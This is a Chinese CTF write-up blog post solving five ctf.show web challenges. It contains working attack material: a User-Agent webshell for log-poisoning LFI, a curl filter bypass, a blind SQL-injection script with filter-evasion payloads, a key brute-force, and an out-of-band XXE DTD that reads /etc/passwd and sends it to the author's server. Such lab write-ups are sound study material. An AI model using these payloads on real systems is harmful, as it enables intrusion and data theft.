<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-corner-indicator.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"yoursite.com","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":true,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="昨天就看了签到题比较匆忙，没猜着文件名就没做了，今天好好复现">
<meta property="og:type" content="article">
<meta property="og:title" content="36D-web-ak-challenge">
<meta property="og:url" content="http://yoursite.com/2020/07/31/36D-web-ak-challenge/index.html">
<meta property="og:site_name" content="be a J0K1R">
<meta property="og:description" content="昨天就看了签到题比较匆忙，没猜着文件名就没做了，今天好好复现">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://yoursite.com/2020/07/31/36D-web-ak-challenge/1.png">
<meta property="og:image" content="http://yoursite.com/2020/07/31/36D-web-ak-challenge/2.png">
<meta property="og:image" content="http://yoursite.com/2020/07/31/36D-web-ak-challenge/3.png">
<meta property="og:image" content="http://yoursite.com/2020/07/31/36D-web-ak-challenge/4.png">
<meta property="og:image" content="http://yoursite.com/2020/07/31/36D-web-ak-challenge/5.png">
<meta property="og:image" content="http://yoursite.com/2020/07/31/36D-web-ak-challenge/6.png">
<meta property="og:image" content="http://yoursite.com/2020/07/31/36D-web-ak-challenge/7.png">
<meta property="og:image" content="http://yoursite.com/2020/07/31/36D-web-ak-challenge/8.png">
<meta property="og:image" content="http://yoursite.com/2020/07/31/36D-web-ak-challenge/9.png">
<meta property="article:published_time" content="2020-07-31T14:17:40.000Z">
<meta property="article:modified_time" content="2020-08-03T02:29:18.056Z">
<meta property="article:author" content="Peguin">
<meta property="article:tag" content="show">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://yoursite.com/2020/07/31/36D-web-ak-challenge/1.png">

<link rel="canonical" href="http://yoursite.com/2020/07/31/36D-web-ak-challenge/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'en'
  };
</script>

  <title>36D-web-ak-challenge | be a J0K1R</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<link rel="alternate" href="/atom.xml" title="be a J0K1R" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">be a J0K1R</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>Search
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="Searching..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/07/31/36D-web-ak-challenge/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/1.jpg">
      <meta itemprop="name" content="Peguin">
      <meta itemprop="description" content="敢于去想，才会有MEteor的光芒闪耀。">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="be a J0K1R">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          36D-web-ak-challenge
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2020-07-31 22:17:40" itemprop="dateCreated datePublished" datetime="2020-07-31T22:17:40+08:00">2020-07-31</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2020-08-03 10:29:18" itemprop="dateModified" datetime="2020-08-03T10:29:18+08:00">2020-08-03</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>昨天就看了签到题比较匆忙，没猜着文件名就没做了，今天好好复现<a id="more"></a></p>
<h2 id="签到-观己"><a href="#签到-观己" class="headerlink" title="签到_观己"></a>签到_观己</h2><h3 id="知识点"><a href="#知识点" class="headerlink" title="知识点"></a>知识点</h3><ul>
<li>nginx日志文件路径</li>
<li>UA字段插入一句话木马</li>
</ul>
<h3 id="解题步骤"><a href="#解题步骤" class="headerlink" title="解题步骤"></a>解题步骤</h3><p>开题给了源码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">'file'</span>]))&#123;</span><br><span class="line">    $file = $_GET[<span class="string">'file'</span>];</span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">'/php/i'</span>, $file))&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">'error'</span>);</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">include</span>($file);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>开始以为考点在preg_match()函数的绕过，尝试了数组和换行符进行绕过php过滤，先入为主了，以为过滤了php后缀flag文件就是flag.php，没有考虑到flag.txt,还在那尝试了半天的路径穿越</p>
<p>知道了文件名直接猜测在根目录下面</p>
<img src="/2020/07/31/36D-web-ak-challenge/1.png" class="">

<p>正解应该不是这样做的，先看一下nginx的日志文件<code>?file=/var/log/nginx/access.log</code></p>
<img src="/2020/07/31/36D-web-ak-challenge/2.png" class="">

<p>看到了包含UA字段，尝试能不能在UA字段插入一句话🐎，抓包添加一下放包</p>
<img src="/2020/07/31/36D-web-ak-challenge/3.png" class="">

<p>可以看到根目录下的flag.txt文件，再读取</p>
<p>还有一种解法使用伪协议data://，但是这题行不通，allow_url_include是off(附上伪协议文章，很详细<a href="https://blog.csdn.net/nzjdsds/article/details/82461043" target="_blank" rel="noopener">https://blog.csdn.net/nzjdsds/article/details/82461043</a>)</p>
<h2 id="web1-观字"><a href="#web1-观字" class="headerlink" title="web1_观字"></a>web1_观字</h2><h3 id="知识点-1"><a href="#知识点-1" class="headerlink" title="知识点"></a>知识点</h3><ul>
<li>curl命令</li>
<li>curl命令。能够替换.</li>
</ul>
<h3 id="解题步骤-1"><a href="#解题步骤-1" class="headerlink" title="解题步骤"></a>解题步骤</h3><p>开题送源码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment">#flag in http://192.168.7.68/flag</span></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">'url'</span>]))&#123;</span><br><span class="line">    $url = $_GET[<span class="string">'url'</span>];</span><br><span class="line">    $protocol = substr($url, <span class="number">0</span>,<span class="number">7</span>);</span><br><span class="line">    <span class="keyword">if</span>($protocol!=<span class="string">'http://'</span>)&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">'仅限http协议访问'</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">'/\.|\;|\||\&lt;|\&gt;|\*|\%|\^|\(|\)|\#|\@|\!|\`|\~|\+|\'|\"|\.|\,|\?|\[|\]|\&#123;|\&#125;|\!|\&amp;|\$|0/'</span>, $url))&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">'仅限域名地址访问'</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    system(<span class="string">'curl '</span>.$url);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>直接给了flag的位置，问题是怎么绕过过滤让curl执行读取文件信息</p>
<p>这里进制转换不行，过滤了0，转换为十进制为3232237380</p>
<p>这里就要用到上面那的知识点用(。)替代(.)</p>
<img src="/2020/07/31/36D-web-ak-challenge/4.png" class="">

<h2 id="web2-观星"><a href="#web2-观星" class="headerlink" title="web2_观星"></a>web2_观星</h2><h3 id="知识点-2"><a href="#知识点-2" class="headerlink" title="知识点"></a>知识点</h3><ul>
<li>substr()逗号被过滤时用from x1 for x2替代</li>
<li>if替代，case when then else end</li>
</ul>
<h3 id="解题步骤-2"><a href="#解题步骤-2" class="headerlink" title="解题步骤"></a>解题步骤</h3><p>开题，能选择三个链接，跟id有关，首先想到的是SQL注入</p>
<p>测试一下，发现空格、逗号、ascii、like、=等被过滤了</p>
<p><code>substr(database() from 1 for 1 )代替substr(database(),1,1)</code></p>
<p><code>case when代替if</code></p>
<p><code>ord代替ascii</code></p>
<p><code>regexp代替like、=</code></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url = <span class="string">"http://ac6a84ba-b399-4b05-8a0d-a103b394dfc9.chall.ctf.show/index.php?id=1^"</span></span><br><span class="line">flag = <span class="string">""</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1</span>,<span class="number">40</span>):</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> range(<span class="number">32</span>,<span class="number">127</span>):</span><br><span class="line">        payload1 = <span class="string">"case(ord(substr(database()from(&#123;0&#125;)for(1))))when(&#123;1&#125;)then(2)else(3)end"</span>.format(i,j)<span class="comment">#web1</span></span><br><span class="line">        payload2 = <span class="string">"case(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)regexp(database()))from(&#123;0&#125;)for(1))))when(&#123;1&#125;)then(2)else(3)end"</span>.format(i,j)<span class="comment">#flag,page,user</span></span><br><span class="line">        payload3 = <span class="string">"case(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)regexp(0x666c6167))from(&#123;0&#125;)for(1))))when(&#123;1&#125;)then(2)else(3)end"</span>.format(i,j)<span class="comment">#FLAG_COLUMN,flag</span></span><br><span class="line">        payload4 = <span class="string">"case(ord(substr((select(group_concat(flag))from(flag))from(&#123;0&#125;)for(1))))when(&#123;1&#125;)then(2)else(3)end"</span>.format(i,j)</span><br><span class="line">        <span class="comment"># print(payload1)</span></span><br><span class="line">        <span class="comment"># print(url+payload3)</span></span><br><span class="line">        r = requests.get(url+payload4)</span><br><span class="line">        <span class="comment"># print(r.text)</span></span><br><span class="line">        <span class="keyword">if</span> <span class="string">"I asked nothing"</span> <span class="keyword">in</span> r.text:</span><br><span class="line">            flag += chr(j)</span><br><span class="line">            print(flag)</span><br><span class="line">            <span class="keyword">break</span></span><br></pre></td></tr></table></figure>

<p>本来想用二分法，但是这题好像不太合适，常规方法速度也挺快的，就用常规的盲注方法好了</p>
<h2 id="web3-观图"><a href="#web3-观图" class="headerlink" title="web3_观图"></a>web3_观图</h2><h3 id="知识点-3"><a href="#知识点-3" class="headerlink" title="知识点"></a>知识点</h3><ul>
<li>openssl_decrypt函数加密</li>
<li>rand()函数最大值</li>
<li>暴力破解</li>
</ul>
<h3 id="解题步骤-3"><a href="#解题步骤-3" class="headerlink" title="解题步骤"></a>解题步骤</h3><p>开题是一张GIF图片，查看源码发现提示</p>
<img src="/2020/07/31/36D-web-ak-challenge/5.png" class="">

<p>直接访问showImage.php，拿到了源码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment">//$key = substr(md5('ctfshow'.rand()),3,8);</span></span><br><span class="line"><span class="comment">//flag in config.php</span></span><br><span class="line"><span class="keyword">include</span>(<span class="string">'config.php'</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">'image'</span>]))&#123;</span><br><span class="line">    $image=$_GET[<span class="string">'image'</span>];</span><br><span class="line">    $str = openssl_decrypt($image, <span class="string">'bf-ecb'</span>, $key);</span><br><span class="line">    <span class="keyword">if</span>(file_exists($str))&#123;</span><br><span class="line">        header(<span class="string">'content-type:image/gif'</span>);</span><br><span class="line">        <span class="keyword">echo</span> file_get_contents($str);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>从源码中就可以看出要爆破出key的值，查一下opessl_decrypt函数的用法，尝试爆破</p>
<p>源码中只要我们能够得到解密后的文件名并且存在，就能够包含该文件</p>
<p>先来看一下rand()函数的最大值</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">	<span class="keyword">echo</span>(getrandmax());</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line">    <span class="number">32767</span></span><br></pre></td></tr></table></figure>

<p>下面就碰撞出key的值</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">for</span>($i=<span class="number">0</span>;$i&lt;<span class="number">32768</span>;$i++)&#123;</span><br><span class="line">    $key = substr(md5(<span class="string">'ctfshow'</span>.$i),<span class="number">3</span>,<span class="number">8</span>);</span><br><span class="line">    $image=<span class="string">"Z6Ilu83MIDw="</span>;</span><br><span class="line">    $str = openssl_decrypt($image, <span class="string">'bf-ecb'</span>, $key);</span><br><span class="line">    <span class="keyword">if</span>(strpos($str,<span class="string">"gif"</span>) <span class="keyword">or</span> strpos($str,<span class="string">"jpg"</span>) <span class="keyword">or</span> strpos($str,<span class="string">"png"</span>))&#123;</span><br><span class="line">        <span class="keyword">print</span>($str.<span class="string">" "</span>);</span><br><span class="line">        <span class="keyword">print</span>($i);</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="number">327671.</span>jpg <span class="number">27347</span></span><br></pre></td></tr></table></figure>

<p>文件格式不外乎gif\png\jpg</p>
<p>只要解密后能够匹配到就算成功了</p>
<p>得到$i的值为27347</p>
<p>下面就是解密了，由于浏览器会进行一次url解码，这里要进行一下编码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">$rand=<span class="number">27347</span>;</span><br><span class="line">$key = substr(md5(<span class="string">'ctfshow'</span>.$rand),<span class="number">3</span>,<span class="number">8</span>);</span><br><span class="line">$image=<span class="string">"config.php"</span>;</span><br><span class="line">$str = openssl_encrypt($image, <span class="string">'bf-ecb'</span>, $key);</span><br><span class="line"><span class="keyword">echo</span> $str;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">'&lt;br /&gt;'</span>;</span><br><span class="line"><span class="keyword">echo</span> urlencode($str);</span><br><span class="line"><span class="number">27347</span>N6bf8Bd8jm0SpmTZGl0isw==&lt;br /&gt;N6bf8Bd8jm0SpmTZGl0isw%<span class="number">3</span>D%<span class="number">3</span>D</span><br></pre></td></tr></table></figure>

<p>访问</p>
<img src="/2020/07/31/36D-web-ak-challenge/6.png" class="">

<p>一张打不开的图片，下载下来保存，notepad++打开即可</p>
<img src="/2020/07/31/36D-web-ak-challenge/7.png" class="">

<h2 id="web4-观心"><a href="#web4-观心" class="headerlink" title="web4_观心"></a>web4_观心</h2><h3 id="知识点-4"><a href="#知识点-4" class="headerlink" title="知识点"></a>知识点</h3><ul>
<li>xxe的DTD实体</li>
</ul>
<h3 id="解题步骤-4"><a href="#解题步骤-4" class="headerlink" title="解题步骤"></a>解题步骤</h3><img src="/2020/07/31/36D-web-ak-challenge/8.png" class="">

<p>占卜时可以看到向api.php，POST传参api和city</p>
<p>可以看到文件格式是xml</p>
<p>应该是Blind_OOB_XXE ，这里有篇文章<a href="https://blog.csdn.net/weixin_39194641/article/details/102251374" target="_blank" rel="noopener">https://blog.csdn.net/weixin_39194641/article/details/102251374</a></p>
<p>在自己的vps上起一个xml和dtd</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version="1.0" encoding="utf-8"?&gt;</span> </span><br><span class="line"><span class="meta">&lt;!DOCTYPE <span class="meta-keyword">test</span> [ </span></span><br><span class="line"><span class="meta"><span class="meta">&lt;!ENTITY % <span class="meta-keyword">remote</span> <span class="meta-keyword">SYSTEM</span> <span class="meta-string">"http://ip/test.dtd"</span>&gt;</span> </span></span><br><span class="line"><span class="meta">%remote;%int;%send; ]&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">reset</span>&gt;</span><span class="tag">&lt;<span class="name">login</span>&gt;</span>bee<span class="tag">&lt;/<span class="name">login</span>&gt;</span><span class="tag">&lt;<span class="name">secret</span>&gt;</span>Any bugs?<span class="tag">&lt;/<span class="name">secret</span>&gt;</span><span class="tag">&lt;/<span class="name">reset</span>&gt;</span></span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;!ENTITY % p1 SYSTEM &quot;file:&#x2F;&#x2F;&#x2F;etc&#x2F;passwd&quot;&gt;</span><br><span class="line">&lt;!ENTITY % p2 &quot;&lt;!ENTITY xxe SYSTEM &#39;ip&#x2F;pass&#x3D;%p1;&#39;&gt;&quot;&gt;</span><br><span class="line">%p2;</span><br></pre></td></tr></table></figure>

<p>post传参访问自己的vps网页就行</p>
<img src="/2020/07/31/36D-web-ak-challenge/9.png" class="">
    </div>

    
    
    
        <div class="reward-container">
  <div></div>
  <button onclick="var qr = document.getElementById('qr'); qr.style.display = (qr.style.display === 'none') ? 'block' : 'none';">
    Donate
  </button>
  <div id="qr" style="display: none;">
      
      <div style="display: inline-block;">
        <img src="/images/wechatpay.jpg" alt="Peguin WeChat Pay">
        <p>WeChat Pay</p>
      </div>
      
      <div style="display: inline-block;">
        <img src="/images/alipay.jpg" alt="Peguin Alipay">
        <p>Alipay</p>
      </div>

  </div>
</div>

        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>Post author:  </strong>Peguin
  </li>
  <li class="post-copyright-link">
    <strong>Post link: </strong>
    <a href="http://yoursite.com/2020/07/31/36D-web-ak-challenge/" title="36D-web-ak-challenge">http://yoursite.com/2020/07/31/36D-web-ak-challenge/</a>
  </li>
  <li class="post-copyright-license">
    <strong>Copyright Notice:  </strong>All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> unless stating additionally.
  </li>
</ul>
</div>

        

  <div class="followme">
    <p>Welcome to my other publishing channels</p>

    <div class="social-list">

        <div class="social-item">
          <a target="_blank" class="social-link" href="/images/2.jpg">
            <span class="icon">
              <i class="fab fa-weixin"></i>
            </span>

            <span class="label">WeChat</span>
          </a>
        </div>

        <div class="social-item">
          <a target="_blank" class="social-link" href="/atom.xml">
            <span class="icon">
              <i class="fa fa-rss"></i>
            </span>

            <span class="label">RSS</span>
          </a>
        </div>
    </div>
  </div>


      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/show/" rel="tag"># show</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/07/31/DSAJuly/" rel="prev" title="DSAJuly">
      <i class="fa fa-chevron-left"></i> DSAJuly
    </a></div>
      <div class="post-nav-item">
    <a href="/2020/08/04/SWPUCTF2016-Web-blogsys/" rel="next" title="SWPUCTF2016-Web-blogsys">
      SWPUCTF2016-Web-blogsys <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  <div>
  
    <div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">-------------本文结束<i class="fa fa-paw"></i>感谢您的阅读-------------</div>
    
</div>
  
</div>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#签到-观己"><span class="nav-number">1.</span> <span class="nav-text">签到_观己</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#知识点"><span class="nav-number">1.1.</span> <span class="nav-text">知识点</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#解题步骤"><span class="nav-number">1.2.</span> <span class="nav-text">解题步骤</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web1-观字"><span class="nav-number">2.</span> <span class="nav-text">web1_观字</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#知识点-1"><span class="nav-number">2.1.</span> <span class="nav-text">知识点</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#解题步骤-1"><span class="nav-number">2.2.</span> <span class="nav-text">解题步骤</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web2-观星"><span class="nav-number">3.</span> <span class="nav-text">web2_观星</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#知识点-2"><span class="nav-number">3.1.</span> <span class="nav-text">知识点</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#解题步骤-2"><span class="nav-number">3.2.</span> <span class="nav-text">解题步骤</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web3-观图"><span class="nav-number">4.</span> <span class="nav-text">web3_观图</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#知识点-3"><span class="nav-number">4.1.</span> <span class="nav-text">知识点</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#解题步骤-3"><span class="nav-number">4.2.</span> <span class="nav-text">解题步骤</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web4-观心"><span class="nav-number">5.</span> <span class="nav-text">web4_观心</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#知识点-4"><span class="nav-number">5.1.</span> <span class="nav-text">知识点</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#解题步骤-4"><span class="nav-number">5.2.</span> <span class="nav-text">解题步骤</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Peguin"
      src="/images/1.jpg">
  <p class="site-author-name" itemprop="name">Peguin</p>
  <div class="site-description" itemprop="description">敢于去想，才会有MEteor的光芒闪耀。</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">60</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">33</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
